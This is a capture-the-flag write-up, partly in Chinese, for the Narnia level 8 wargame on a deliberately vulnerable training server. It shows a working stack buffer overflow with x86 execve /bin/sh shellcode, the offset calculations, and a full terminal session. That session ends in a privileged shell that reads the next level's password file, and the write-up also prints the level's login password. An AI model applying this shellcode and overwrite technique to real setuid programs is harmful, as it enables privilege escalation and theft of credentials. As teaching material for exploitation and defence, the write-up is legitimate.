narnia8

/** narnia8.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am 
// making "i" global unti i find a fix 
// -morla 
int i; 

void func(char *b){
	char *blah=b;
	char bok[20];
	//int i=0;
	
	memset(bok, '\0', sizeof(bok));
	for(i=0; blah[i] != '\0'; i++)
		bok[i]=blah[i];

	printf("%s\n",bok);
}

int main(int argc, char **argv){
        
	if(argc > 1)       
		func(argv[1]);
	else    
	printf("%s argument\n", argv[0]);

	return 0;
}

/** nar.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am 
// making "i" global unti i find a fix 
// -morla 
int i; 

void func(char *b){
	char *blah=b;
	char bok[20];
	//int i=0;
	
        printf("%p\n", blah);
	memset(bok, '\0', sizeof(bok));
	for(i=0; blah[i] != '\0'; i++)
		bok[i]=blah[i];

	printf("%s\n",bok);
}

int main(int argc, char **argv){
        
	if(argc > 1)       
		func(argv[1]);
	else    
	printf("%s argument\n", argv[0]);

	return 0;
}

栈环境

blah存储着一个指针， 指针指向argv[1]， 这个argv参数是在main函数之前压栈的， 所以下面我们计算这个地址时， 不需要处理对齐的情况

这个argv1 字符串参数 必须把func结束后eip地址替换掉， 既图的最上面的eip的值

那么从bok开始我们要覆盖的数据是 20B + 4B + 12B + 4B

前一个4B是blah本来的值， 后一个4B是 存储shellcode的环境变量EGG的值

通过运行 narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xff\xff\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU�n��

可以推算出 /narnia/narnia8 的blah的值为0xffffd7b4 - 0x14 = 0xffffd7a0

这里计算偏移和narnia4不同 narnia4的偏移为0x10 是因为计算的是buffer的地址， 这个地址是main函数中16字节对齐之后的结果

而此处的偏移为0x14 既 strlen("/narnia/narnia8") * 2 - strlen("./nar")  * 2 是因为我要得到的值是argv[1]的地址， 这个地址是在main函数之前压栈的

这时候还没有经过main函数的16字节对齐处理, 所以相差20个字节

如果是对齐的情况， 就是相差 16个字节 （15 * 2 对齐到 32） (5 * 2 对齐到 16） 32 - 16 = 16

root@today:~# ssh [email protected]

[email protected]'s password: mohthuphog

narnia8@melinda:~$ cd /tmp/shadowcoder8

narnia8@melinda:/tmp/shadowcoder8$ ls
env  env.c  nar  nar.c  narnia8  narnia8.c  sleep.sh

narnia8@melinda:/tmp/shadowcoder8$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')

narnia8@melinda:/tmp/shadowcoder8$ gcc nar.c  -o nar -m32 -z execstack -fno-stack-protector

narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xff\xff\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU�n��

narnia8@melinda:/tmp/shadowcoder8$ ./nar `python -c 'print "U"*20 + "\xb4\xd7\xff\xff" + "U"*12 + "abcd"'`
0xffffd7b4
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUUabcd����
Segmentation fault

narnia8@melinda:/tmp/shadowcoder8$ /narnia/narnia8 `python -c 'print "U"*20 + "\xa0\xd7\xff\xff" + "U"*12 + "abcd"'`
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUUabcd����
Segmentation fault

narnia8@melinda:/tmp/shadowcoder8$ gcc env.c -o env -m32

narnia8@melinda:/tmp/shadowcoder8$ ./env EGG /narnia/narnia8
0xffffd8a3

narnia8@melinda:/tmp/shadowcoder8$ /narnia/narnia8 `python -c 'print "U"*20 + "\xa0\xd7\xff\xff" + "U"*12 + "\xa3\xd8\xff\xff"'`
UUUUUUUUUUUUUUUUUUUU����UUUUUUUUUUUU��������
$ whoami
narnia9
$ cat /etc/narnia_pass/narnia9
eiL5fealae
$